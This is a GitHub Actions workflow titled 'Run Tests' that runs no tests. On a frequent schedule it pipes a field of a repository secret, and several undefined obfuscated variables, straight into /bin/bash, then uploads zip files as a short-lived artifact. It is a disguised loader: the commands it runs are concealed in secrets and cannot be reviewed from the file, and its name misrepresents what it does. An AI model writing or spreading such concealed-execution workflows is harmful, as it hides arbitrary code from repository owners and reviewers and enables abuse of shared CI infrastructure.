name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '50 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          fdbbr8306: ${{ secrets.fdbbr8306 }}
        run: |
          printf '%s' "$fdbbr8306" | jq -r .pb54428 | /bin/bash
          echo $aer17 | jq -r .rjln468 | /bin/bash
          echo $c89 | jq -r .mlig75 | /bin/bash
          echo $ya14380 | jq -r .sxk2 | /bin/bash
          printf '%s' "$dads256" | jq -r .u0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: CQeZLaG6
          path: "*.zip"
          retention-days: 1
